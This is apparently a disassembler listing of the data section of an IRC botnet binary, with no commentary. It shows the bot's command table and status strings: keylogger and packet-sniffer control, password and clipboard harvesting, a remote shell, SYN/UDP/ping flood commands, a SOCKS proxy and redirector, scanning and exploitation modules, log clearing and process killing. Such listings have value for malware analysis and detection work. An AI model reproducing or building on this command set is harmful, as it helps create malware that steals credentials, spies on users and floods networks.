aDownload_up db 'download.up',0 ; DATA XREF: sub_40EE72+2552�o
aDownload_updat db 'download.update',0 ; DATA XREF: sub_40EE72+253B�o
aIrc_de db 'irc.de',0 ; DATA XREF: sub_40EE72+2524�o
align 4
aIrc_delay db 'irc.delay',0 ; DATA XREF: sub_40EE72+250D�o
align 10h
aIrc_rp db 'irc.rp',0 ; DATA XREF: sub_40EE72+24F6�o
align 4
aIrc_repeat db 'irc.repeat',0 ; DATA XREF: sub_40EE72+24DF�o
align 4
aClone_p db 'clone.p',0 ; DATA XREF: sub_40EE72+24C8�o
aClone_part db 'clone.part',0 ; DATA XREF: sub_40EE72+24B1�o
align 4
aClone_j db 'clone.j',0 ; DATA XREF: sub_40EE72+249A�o
aClone_join db 'clone.join',0 ; DATA XREF: sub_40EE72+2483�o
align 4
aClone_ni db 'clone.ni',0 ; DATA XREF: sub_40EE72+246C�o
align 4
aClone_nick db 'clone.nick',0 ; DATA XREF: sub_40EE72+2455�o
align 4
aClone_m db 'clone.m',0 ; DATA XREF: sub_40EE72+243E�o
aClone_mode db 'clone.mode',0 ; DATA XREF: sub_40EE72+2427�o
align 4
aClone_ra db 'clone.ra',0 ; DATA XREF: sub_40EE72+2410�o
align 4
aClone_raw db 'clone.raw',0 ; DATA XREF: sub_40EE72+23F9�o
align 10h
aIrc_m db 'irc.m',0 ; DATA XREF: sub_40EE72+23E2�o
align 4
aIrc_mode db 'irc.mode',0 ; DATA XREF: sub_40EE72+23CB�o
align 4
aIrc_cy db 'irc.cy',0 ; DATA XREF: sub_40EE72+23B4�o
align 4
aIrc_cycle db 'irc.cycle',0 ; DATA XREF: sub_40EE72+239D�o
align 4
aIrc_ac db 'irc.ac',0 ; DATA XREF: sub_40EE72+2386�o
align 10h
aIrc_action db 'irc.action',0 ; DATA XREF: sub_40EE72+236F�o
align 4
aIrc_pm db 'irc.pm',0 ; DATA XREF: sub_40EE72+2358�o
align 4
aIrc_privmsg db 'irc.privmsg',0 ; DATA XREF: sub_40EE72+2341�o
aIrc_aa db 'irc.aa',0 ; DATA XREF: sub_40EE72+232A�o
align 4
aIrc_addalias db 'irc.addalias',0 ; DATA XREF: sub_40EE72+2313�o
align 4
aIrc_gh db 'irc.gh',0 ; DATA XREF: sub_40EE72+22EA�o
align 10h
aIrc_gethost db 'irc.gethost',0 ; DATA XREF: sub_40EE72+22D3�o
aCom_cap db 'com.cap',0 ; DATA XREF: sub_40EE72+22BC�o
aCom_capture db 'com.capture',0 ; DATA XREF: sub_40EE72+22A5�o
dword_431DF0 dd 7A026E02h, 201F6D1Fh, 74656E28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72:loc_4110C9�o
dd 2BBBB02h
aCommandUnknown db ' Command unknown.',0
align 4
dword_431E1C dd 7A026E02h, 201F6D1Fh, 74656E28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72:loc_4110C2�o
dd 2BBBB02h
aNoMessageSpeci db ' No message specified.',0
dword_431E4C dd 7A026E02h, 201F6D1Fh, 74656E28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72:loc_411077�o
dd 2BBBB02h
aUserListFailed db ' User list failed.',0
dword_431E78 dd 7A026E02h, 201F6D1Fh, 74656E28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+21FE�o
dd 2BBBB02h
aUserListComple db ' User list completed.',0
align 4
aUser db 'user',0 ; DATA XREF: sub_40EE72+218A�o
align 10h
dword_431EB0 dd 7A026E02h, 201F6D1Fh, 74656E28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72:loc_410FF1�o
dd 2BBBB02h
aShareListFaile db ' Share list failed.',0
align 10h
dword_431EE0 dd 7A026E02h, 201F6D1Fh, 74656E28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+2175�o
dd 2BBBB02h
aShareListCompl db ' Share list completed.',0
aShare db 'share',0 ; DATA XREF: sub_40EE72+211F�o
align 4
aDelete db 'delete',0 ; DATA XREF: sub_40EE72+20FD�o
align 10h
aContinue db 'continue',0 ; DATA XREF: sub_40EE72+20E5�o
align 4
aPause db 'pause',0 ; DATA XREF: sub_40EE72+20CD�o
align 4
aStop db 'stop',0 ; DATA XREF: sub_40EE72+20B5�o
align 4
dword_431F3C dd 7A026E02h, 201F6D1Fh, 74656E28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72:loc_410F1C�o
dd 2BBBB02h
aServiceListFai db ' Service list failed.',0
align 4
dword_431F6C dd 7A026E02h, 201F6D1Fh, 74656E28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+20A0�o
dd 2BBBB02h
aServiceListCom db ' Service list completed.',0
align 10h
aStart db 'start',0 ; DATA XREF: sub_40EE72+2069�o
align 4
dword_431FA8 dd 7A026E02h, 201F6D1Fh, 74656E28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+2036�o
dd 2BBBB02h
aFailedToLoadAd db ' Failed to load advapi32.dll or netapi32.dll.',0
align 10h
aCom_net db 'com.net',0 ; DATA XREF: sub_40EE72+2012�o
unk_431FF8 db 2 ; DATA XREF: sub_40EE72+1FD1�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 6Bh, 65h, 79h
db 6Ch ; l
db 6Fh, 67h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aFailedToSta_26 db ' Failed to start logging thread, error: <%d>.',0
align 4
unk_432044 db 2 ; DATA XREF: sub_40EE72+1F66�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 6Bh, 65h, 79h
db 6Ch ; l
db 6Fh, 67h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aKeyLoggerActiv db ' Key logger active.',0
unk_432074 db 2 ; DATA XREF: sub_40EE72+1EE5�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 6Bh, 65h, 79h
db 6Ch ; l
db 6Fh, 67h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aAlreadyRunni_1 db ' Already running.',0
align 4
unk_4320A4 db 2 ; DATA XREF: sub_40EE72:loc_410D33�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 6Bh, 65h, 79h
db 6Ch ; l
db 6Fh, 67h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aNoKeyLoggerThr db ' No key logger thread found.',0
align 10h
unk_4320E0 db 2 ; DATA XREF: sub_40EE72+1EB7�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 6Bh, 65h, 79h
db 6Ch ; l
db 6Fh, 67h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aKeyLoggerStopp db ' Key logger stopped. (%d thread(s) stopped.)',0
align 4
aFile db 'file',0 ; DATA XREF: sub_40EE72+1E83�o
; sub_40EE72+1EF9�o
align 4
aCom_keylog db 'com.keylog',0 ; DATA XREF: sub_40EE72+1E5D�o
align 10h
unk_432140 db 2 ; DATA XREF: sub_40EE72:loc_410CC5�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 6Eh, 69h
db 66h ; f
db 66h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aNoCarnivoreThr db 'No Carnivore thread found.',0
align 4
unk_432178 db 2 ; DATA XREF: sub_40EE72+1E49�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 6Eh, 69h
db 66h ; f
db 66h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aCarnivoreStopp db 'Carnivore stopped. (%d thread(s) stopped.)',0
align 10h
aOff db 'off',0 ; DATA XREF: sub_40EE72+1E26�o
; sub_40EE72+1E94�o
unk_4321C4 db 2 ; DATA XREF: sub_40EE72+1E1B�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 6Eh, 69h
db 66h ; f
db 66h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aFailedToSta_27 db 'Failed to start sniffer thread, error: <%d>.',0
align 10h
unk_432210 db 2 ; DATA XREF: sub_40EE72+1DAC�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 6Eh, 69h
db 66h ; f
db 66h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aCarnivorePacke db 'Carnivore packet sniffer active.',0
align 10h
unk_432250 db 2 ; DATA XREF: sub_40EE72+1D45�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 6Eh, 69h
db 66h ; f
db 66h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aAlreadyRunni_2 db 'Already running.',0
align 10h
aOn db 'on',0 ; DATA XREF: sub_40EE72+1D25�o
; sub_40EE72+1E72�o
align 4
aSniff db 'sniff',0 ; DATA XREF: sub_40EE72+1D10�o
align 4
aCom_rf db 'com.rf',0 ; DATA XREF: sub_40EE72+1CF9�o
align 4
aCom_readfile db 'com.readfile',0 ; DATA XREF: sub_40EE72+1CE2�o
align 4
aCom_cm db 'com.cm',0 ; DATA XREF: sub_40EE72+1CCB�o
align 4
aCom_cmd db 'com.cmd',0 ; DATA XREF: sub_40EE72+1CB4�o
aMirc_cmd db 'mirc.cmd',0 ; DATA XREF: sub_40EE72+1C86�o
; sub_40EE72+1C9D�o
align 10h
aIrc_v db 'irc.v',0 ; DATA XREF: sub_40EE72+1C6F�o
align 4
aIrc_visit db 'irc.visit',0 ; DATA XREF: sub_40EE72+1C58�o
align 4
aCom_fl db 'com.fl',0 ; DATA XREF: sub_40EE72+1C41�o
align 4
aCom_filelist db 'com.filelist',0 ; DATA XREF: sub_40EE72+1C2A�o
align 4
aDcc_gt db 'dcc.gt',0 ; DATA XREF: sub_40EE72+1C13�o
align 4
aDcc_get db 'dcc.get',0 ; DATA XREF: sub_40EE72+1BFC�o
aCom_del db 'com.del',0 ; DATA XREF: sub_40EE72+1BE5�o
aCom_delete db 'com.delete',0 ; DATA XREF: sub_40EE72+1BCE�o
align 10h
aCom_pkid db 'com.pkid',0 ; DATA XREF: sub_40EE72+1BB7�o
align 4
aCom_prockillid db 'com.prockillid',0 ; DATA XREF: sub_40EE72+1BA0�o
align 4
aCom_kpn db 'com.kpn',0 ; DATA XREF: sub_40EE72+1B89�o
aCom_killprocna db 'com.killprocname',0 ; DATA XREF: sub_40EE72+1B72�o
align 4
aIrc_dn db 'irc.dn',0 ; DATA XREF: sub_40EE72+1B5B�o
align 10h
aIrc_dns db 'irc.dns',0 ; DATA XREF: sub_40EE72+1B44�o
aIrc_se db 'irc.se',0 ; DATA XREF: sub_40EE72+1B2D�o
align 10h
aIrc_setserve db 'irc.setserve',0 ; DATA XREF: sub_40EE72+1B16�o
align 10h
aCom_o db 'com.o',0 ; DATA XREF: sub_40EE72+1AFF�o
align 4
aCom_open db 'com.open',0 ; DATA XREF: sub_40EE72+1AE8�o
align 4
aIrc_pr db 'irc.pr',0 ; DATA XREF: sub_40EE72+1AD1�o
align 4
aIrc_prefix db 'irc.prefix',0 ; DATA XREF: sub_40EE72+1ABA�o
align 4
aClone_rn db 'clone.rn',0 ; DATA XREF: sub_40EE72+1AA3�o
align 4
aClone_rndnick db 'clone.rndnick',0 ; DATA XREF: sub_40EE72+1A8C�o
align 4
aClone_q db 'clone.q',0 ; DATA XREF: sub_40EE72+1A75�o
aClone_quit db 'clone.quit',0 ; DATA XREF: sub_40EE72+1A5E�o
align 4
aThreads_k db 'threads.k',0 ; DATA XREF: sub_40EE72+1A47�o
align 4
aThreads_kill db 'threads.kill',0 ; DATA XREF: sub_40EE72+1A30�o
align 4
aIrc_ra db 'irc.ra',0 ; DATA XREF: sub_40EE72+1A19�o
align 4
aIrc_raw db 'irc.raw',0 ; DATA XREF: sub_40EE72+1A02�o
aIrc_pt db 'irc.pt',0 ; DATA XREF: sub_40EE72+19EB�o
align 4
aIrc_part db 'irc.part',0 ; DATA XREF: sub_40EE72+19D4�o
align 4
aIrc_j db 'irc.j',0 ; DATA XREF: sub_40EE72+19BD�o
align 10h
aIrc_join db 'irc.join',0 ; DATA XREF: sub_40EE72+19A6�o
align 4
aIrc_n db 'irc.n',0 ; DATA XREF: sub_40EE72+198F�o
align 4
aIrc_nick db 'irc.nick',0 ; DATA XREF: sub_40EE72+1978�o
align 10h
aSa db 'sa',0 ; DATA XREF: sub_40EE72+1952�o
align 4
aAsc db 'asc',0 ; DATA XREF: sub_40EE72+193D�o
aCom_fp db 'com.fp',0 ; DATA XREF: sub_40EE72+1928�o
align 10h
aCom_findpass db 'com.findpass',0 ; DATA XREF: sub_40EE72+1913�o
align 10h
aDaemon_tf_on db 'daemon.tf.on',0 ; DATA XREF: sub_40EE72+18FE�o
align 10h
aDaemon_tftp_on db 'daemon.tftp.on',0 ; DATA XREF: sub_40EE72+18E9�o
align 10h
aDaemon_web_on db 'daemon.web.on',0 ; DATA XREF: sub_40EE72+18D4�o
align 10h
aDaemon_httpd_o db 'daemon.httpd.on',0 ; DATA XREF: sub_40EE72+18BF�o
aDaemon_rl_on db 'daemon.rl.on',0 ; DATA XREF: sub_40EE72+18AA�o
align 10h
aDaemon_rlogi_0 db 'daemon.rlogin.on',0 ; DATA XREF: sub_40EE72+1895�o
align 4
aRoot_cip db 'root.cip',0 ; DATA XREF: sub_40EE72+1880�o
align 10h
aRoot_currentip db 'root.currentip',0 ; DATA XREF: sub_40EE72+186B�o
align 10h
aUtil_fdns db 'util.fdns',0 ; DATA XREF: sub_40EE72+1856�o
align 4
aUtil_flushdns db 'util.flushdns',0 ; DATA XREF: sub_40EE72+1841�o
align 4
aUtil_farp db 'util.farp',0 ; DATA XREF: sub_40EE72+182C�o
align 4
aUtil_flusharp db 'util.flusharp',0 ; DATA XREF: sub_40EE72+1817�o
align 4
aCom_gc db 'com.gc',0 ; DATA XREF: sub_40EE72+1802�o
align 10h
aCom_getclip db 'com.getclip',0 ; DATA XREF: sub_40EE72+17ED�o
dword_43251C dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+17DD�o
dd 2BBBB02h
aLoginListCompl db ' Login list complete.',0
align 4
aD_S db '%d. %s',0 ; DATA XREF: sub_40EE72+17A9�o
; sub_416E19+46�o
align 4
aEmpty db '<Empty>',0 ; DATA XREF: sub_40EE72+179C�o
aLoginList db '-[Login List]-',0 ; DATA XREF: sub_40EE72+177A�o
align 4
aIrc_who db 'irc.who',0 ; DATA XREF: sub_40EE72+1761�o
aCmd db '[CMD]',0 ; DATA XREF: sub_40EE72+1756�o
align 4
aRemoteShell db 'Remote shell',0 ; DATA XREF: sub_40EE72+1751�o
align 4
aCom_ocmd_off db 'com.ocmd.off',0 ; DATA XREF: sub_40EE72+1738�o
align 4
aCom_ocmd db 'com.ocmd',0 ; DATA XREF: sub_40EE72+1723�o
align 4
aCom_opencmd db 'com.opencmd',0 ; DATA XREF: sub_40EE72+170E�o
aCom_dll db 'com.dll',0 ; DATA XREF: sub_40EE72+16F9�o
aCom_testdlls db 'com.testdlls',0 ; DATA XREF: sub_40EE72+16E4�o
align 4
aCom_drv db 'com.drv',0 ; DATA XREF: sub_40EE72+16CF�o
aCom_driveinfo db 'com.driveinfo',0 ; DATA XREF: sub_40EE72+16BA�o
align 4
aCom_up db 'com.up',0 ; DATA XREF: sub_40EE72+16A5�o
align 4
aCom_uptime db 'com.uptime',0 ; DATA XREF: sub_40EE72+1690�o
align 4
aCom_key db 'com.key',0 ; DATA XREF: sub_40EE72+167B�o
aCom_harvest db 'com.harvest',0 ; DATA XREF: sub_40EE72+1666�o
aCom_ps db 'com.ps',0 ; DATA XREF: sub_40EE72+1651�o
align 4
aCom_procs db 'com.procs',0 ; DATA XREF: sub_40EE72+163C�o
align 10h
aIrc_rm0 db 'irc.rm0',0 ; DATA XREF: sub_40EE72+1627�o
aIrc_rem0ve db 'irc.rem0ve',0 ; DATA XREF: sub_40EE72+1612�o
align 4
aCom_si db 'com.si',0 ; DATA XREF: sub_40EE72+15FD�o
align 4
aCom_sysinfo db 'com.sysinfo',0 ; DATA XREF: sub_40EE72+15E8�o
unk_432648 db 2 ; DATA XREF: sub_40EE72+15DD�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 75h, 70h
db 65h ; e
db 72h, 73h, 79h
db 6Eh ; n
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToSta_28 db ' Failed to start flood thread, error: <%d>.',0
align 4
unk_432694 db 2 ; DATA XREF: sub_40EE72+156E�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 75h, 70h
db 65h ; e
db 72h, 73h, 79h
db 6Eh ; n
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFloodingSSFo_1 db ' Flooding: (%s:%s) for %s seconds.',0
aDdos_supersyn db 'ddos.supersyn',0 ; DATA XREF: sub_40EE72+14D8�o
align 4
aCom_ni db 'com.ni',0 ; DATA XREF: sub_40EE72+14C3�o
align 4
aCom_netinfo db 'com.netinfo',0 ; DATA XREF: sub_40EE72+14AE�o
aUtil_clg db 'util.clg',0 ; DATA XREF: sub_40EE72+1499�o
align 4
aUtil_clearlog db 'util.clearlog',0 ; DATA XREF: sub_40EE72+1484�o
align 4
aIrc_lg db 'irc.lg',0 ; DATA XREF: sub_40EE72+146F�o
align 4
aIrc_log db 'irc.log',0 ; DATA XREF: sub_40EE72+145A�o
aIrc_al db 'irc.al',0 ; DATA XREF: sub_40EE72+1445�o
align 4
aIrc_aliases db 'irc.aliases',0 ; DATA XREF: sub_40EE72+1430�o
aThreads_l db 'threads.l',0 ; DATA XREF: sub_40EE72+141B�o
align 4
aThreads_list db 'threads.list',0 ; DATA XREF: sub_40EE72+1406�o
align 4
dword_432754 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+13D2�o
dd 2BBBB02h
aFailedToReboot db ' Failed to reboot system.',0
align 4
dword_432788 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+13CB�o
dd 2BBBB02h
aRebootingSyste db ' Rebooting system.',0
aCom_rebewt db 'com.rebewt',0 ; DATA XREF: sub_40EE72+13B4�o
align 10h
aIrc_i db 'irc.i',0 ; DATA XREF: sub_40EE72+139F�o
align 4
aIrc_id db 'irc.id',0 ; DATA XREF: sub_40EE72+138A�o
align 10h
aIrc_s db 'irc.s',0 ; DATA XREF: sub_40EE72+1375�o
align 4
aIrc_status db 'irc.status',0 ; DATA XREF: sub_40EE72+1360�o
align 4
aIrc_q db 'irc.q',0 ; DATA XREF: sub_40EE72+134B�o
align 4
aIrc_quit db 'irc.quit',0 ; DATA XREF: sub_40EE72+1336�o
align 4
aIrc_d db 'irc.d',0 ; DATA XREF: sub_40EE72+1321�o
align 10h
aIrc_disconnect db 'irc.disconnect',0 ; DATA XREF: sub_40EE72+130C�o
align 10h
aIrc_r db 'irc.r',0 ; DATA XREF: sub_40EE72+12F7�o
align 4
aIrc_reconnect db 'irc.reconnect',0 ; DATA XREF: sub_40EE72+12E2�o
align 4
aRoot_st db 'root.st',0 ; DATA XREF: sub_40EE72+12CD�o
aRoot_stats db 'root.stats',0 ; DATA XREF: sub_40EE72+12B8�o
align 4
aExploitation db 'Exploitation',0 ; DATA XREF: sub_40EE72+12AD�o
align 4
aScan db 'Scan',0 ; DATA XREF: sub_40EE72+12A8�o
align 4
aRoot_stop db 'root.stop',0 ; DATA XREF: sub_40EE72+128F�o
align 10h
dword_432860 dd 65027302h, 1F727563h, 2E2E1F65h, 0 ; DATA XREF: sub_40EE72+1284�o
aSecure_0 db 'Secure',0 ; DATA XREF: sub_40EE72+127F�o
align 4
aLockdown_stop db 'lockdown.stop',0 ; DATA XREF: sub_40EE72+1266�o
align 4
dword_432888 dd 6C026302h, 1F656E6Fh, 2E2E1F73h, 0 ; DATA XREF: sub_40EE72+125B�o
aClone db 'Clone',0 ; DATA XREF: sub_40EE72+1256�o
align 10h
aClone_off db 'clone.off',0 ; DATA XREF: sub_40EE72+123D�o
align 4
aCom_ps_off db 'com.ps.off',0 ; DATA XREF: sub_40EE72+1228�o
align 4
aCom_procs_off db 'com.procs.off',0 ; DATA XREF: sub_40EE72+1213�o
align 4
aUtil_ff_off db 'util.ff.off',0 ; DATA XREF: sub_40EE72+11FE�o
aUtil_findfile_ db 'util.findfile.off',0 ; DATA XREF: sub_40EE72+11E9�o
align 4
dword_4328E8 dd 66027402h, 641F7074h, 2E2E1Fh ; DATA XREF: sub_40EE72+11DE�o
aDaemon_tftp_of db 'daemon.tftp.off',0 ; DATA XREF: sub_40EE72+11C0�o
dword_432904 dd 69027002h, 1F671F6Eh, 2E2Eh ; DATA XREF: sub_40EE72+11B5�o
dword_432910 dd 676E6950h, 6F6C6620h, 646Fh ; DATA XREF: sub_40EE72+11B0�o
dword_43291C dd 736F6464h, 6E69702Eh, 666F2E67h, 66h ; DATA XREF: sub_40EE72+1197�o
dword_43292C dd 64027502h, 2E1F701Fh, 2Eh ; DATA XREF: sub_40EE72+118C�o
dword_432938 dd 20504455h, 6F6F6C66h, 64h ; DATA XREF: sub_40EE72+1187�o
dword_432944 dd 736F6464h, 7064752Eh, 66666F2Eh, 0 ; DATA XREF: sub_40EE72+116E�o
dword_432954 dd 79027302h, 2E1F6E1Fh, 2Eh ; DATA XREF: sub_40EE72+1163�o
dword_432960 dd 206E7953h, 6F6F6C66h, 64h ; DATA XREF: sub_40EE72+115E�o
dword_43296C dd 736F6464h, 6E79732Eh, 66666F2Eh, 0 ; DATA XREF: sub_40EE72+1145�o
dword_43297C dd 64026402h, 1F731F6Fh, 2E2Eh ; DATA XREF: sub_40EE72+113A�o
dword_432988 dd 536F4444h, 6F6C6620h, 646Fh ; DATA XREF: sub_40EE72+1135�o
dword_432994 dd 736F6464h, 66666F2Eh, 0 ; DATA XREF: sub_40EE72+111C�o
dword_4329A0 dd 65027202h, 65726964h, 1F741F63h, 2E2Eh ; DATA XREF: sub_40EE72+1111�o
dword_4329B0 dd 20504354h, 69646572h, 74636572h, 0 ; DATA XREF: sub_40EE72+110C�o
aProxy_redirect db 'proxy.redirect.off',0 ; DATA XREF: sub_40EE72+10F3�o
align 4
dword_4329D4 dd 6F026C02h, 2E1F671Fh, 2Eh ; DATA XREF: sub_40EE72+10E8�o
dword_4329E0 dd 20676F4Ch, 7473696Ch, 0 ; DATA XREF: sub_40EE72+10E3�o
dword_4329EC dd 2E676F6Ch, 66666Fh ; DATA XREF: sub_40EE72+10CA�o
dword_4329F4 dd 74026802h, 641F7074h, 2E2E1Fh ; DATA XREF: sub_40EE72+10C2�o
dword_432A00 dd 6D656164h, 772E6E6Fh, 6F2E6265h, 6666h ; DATA XREF: sub_40EE72+10A4�o
dword_432A10 dd 6C027202h, 6E69676Fh, 2E1F641Fh, 2Eh ; DATA XREF: sub_40EE72+109C�o
aDaemon_rlogin_ db 'daemon.rlogin.off',0 ; DATA XREF: sub_40EE72+107E�o
align 4
dword_432A34 dd 6F027302h, 1F736B63h, 2E2E1F34h, 0 ; DATA XREF: sub_40EE72+105C�o
aServer db 'Server',0 ; DATA XREF: sub_40EE72+1057�o
; sub_40EE72+1097�o ...
align 4
aProxy_socks4_0 db 'proxy.socks4.off',0 ; DATA XREF: sub_40EE72+103E�o
align 10h
aProxy_s4_on db 'proxy.s4.on',0 ; DATA XREF: sub_40EE72+1029�o
aProxy_socks4_o db 'proxy.socks4.on',0 ; DATA XREF: sub_40EE72+1014�o
aLd_off db 'ld.off',0 ; DATA XREF: sub_40EE72+FFF�o
align 4
aLockdown_off db 'lockdown.off',0 ; DATA XREF: sub_40EE72+FEA�o
align 4
aLd_on db 'ld.on',0 ; DATA XREF: sub_40EE72+FD5�o
align 4
aLockdown_on db 'lockdown.on',0 ; DATA XREF: sub_40EE72+FC0�o
aVer db 'ver',0 ; DATA XREF: sub_40EE72+FAB�o
aIrc_version db 'irc.version',0 ; DATA XREF: sub_40EE72+F96�o
aLo db 'lo',0 ; DATA XREF: sub_40EE72+F81�o
align 4
aIrc_logout db 'irc.logout',0 ; DATA XREF: sub_40EE72+F6C�o
align 4
aIrc_di db 'irc.di',0 ; DATA XREF: sub_40EE72+F57�o
align 10h
aIrc_die db 'irc.die',0 ; DATA XREF: sub_40EE72+F42�o
aRn db 'rn',0 ; DATA XREF: sub_40EE72+F2D�o
align 4
aIrc_rndnick db 'irc.rndnick',0 ; DATA XREF: sub_40EE72+F15�o
a63 db '63',0 ; DATA XREF: sub_40EE72+DEE�o
align 4
asc_432AEC: ; DATA XREF: sub_40EE72+DC6�o
unicode 0, <)>,0
aChr db '$chr(',0 ; DATA XREF: sub_40EE72+D89�o
align 4
aServer_0 db '$server',0 ; DATA XREF: sub_40EE72+D7E�o
aRndnick db '$rndnick',0 ; DATA XREF: sub_40EE72+D6D�o
align 4
aChan db '$chan',0 ; DATA XREF: sub_40EE72+D51�o
align 4
aUser_2 db '$user',0 ; DATA XREF: sub_40EE72+D40�o
align 4
aMe_0 db '$me',0 ; DATA XREF: sub_40EE72+D2E�o
aD db '$%d',0 ; DATA XREF: sub_40EE72+CC0�o
aD_0 db '$%d-',0 ; DATA XREF: sub_40EE72+C05�o
align 4
aC_1: ; DATA XREF: sub_40EE72+B19�o
unicode 0, <c>,0
dword_432B30 dd 7A026E02h, 201F6D1Fh, 63636428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+AE4�o
dd 2BBBB02h
aChatFailedByUn db ' Chat failed by unauthorized user: %s.',0
dword_432B70 dd 7A026E02h, 201F6D1Fh, 63636428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+AD6�o
dd 2BBBB02h
aChatAlreadyAct db ' Chat already active with user: %s.',0
align 10h
dword_432BB0 dd 7A026E02h, 201F6D1Fh, 63636428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+AC8�o
dd 2BBBB02h
aFailedToSta_29 db ' Failed to start chat thread, error: <%d>.',0
dword_432BF4 dd 7A026E02h, 201F6D1Fh, 63636428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+A59�o
dd 2BBBB02h
aChatFromUserS_ db ' Chat from user: %s.',0
align 4
aChat db 'CHAT',0 ; DATA XREF: sub_40EE72+9BF�o
align 4
dword_432C2C dd 7A026E02h, 201F6D1Fh, 63636428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+99C�o
dd 2BBBB02h
aReceiveFileSFa db ' Receive file: ',27h,'%s',27h,' failed from unauthorized user: %s.',0
dword_432C7C dd 7A026E02h, 201F6D1Fh, 63636428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+984�o
; sub_40EE72+4ABC�o
dd 2BBBB02h
aFailedToSta_30 db ' Failed to start transfer thread, error: <%d>.',0
dword_432CC4 dd 49544F4Eh, 25204543h, 13A2073h, 474E4950h, 1732520h
; DATA XREF: sub_40EE72+973�o
dd 0A0Dh
dword_432CDC dd 4E495001h, 47h ; DATA XREF: sub_40EE72+93F�o
aSHasJustVersio db '%s has just versioned me.',0 ; DATA XREF: sub_40EE72+8F9�o
align 10h
dword_432D00 dd 49544F4Eh, 25204543h, 13A2073h, 53524556h, 204E4F49h
; DATA XREF: sub_40EE72+8DC�o
dd 0D017325h, 0Ah
dword_432D1C dd 52455601h, 4E4F4953h, 1 ; DATA XREF: sub_40EE72+8AB�o
dword_432D28 dd 7A026E02h, 201F6D1Fh, 63636428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+791�o
dd 2BBBB02h
aReceiveFileSFr db ' Receive file: ',27h,'%s',27h,' from user: %s.',0
aSend_0 db 'SEND',0 ; DATA XREF: sub_40EE72+6E8�o
align 4
dword_432D6C dd 43434401h, 0 ; DATA XREF: sub_40EE72+6CA�o
dword_432D74 dd 323333h ; DATA XREF: sub_40EE72+651�o
; sub_40EE72+B4F�o ...
dword_432D78 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+5D2�o
dd 2BBBB02h
aUserSLoggedOut db ' User: %s logged out.',0
align 4
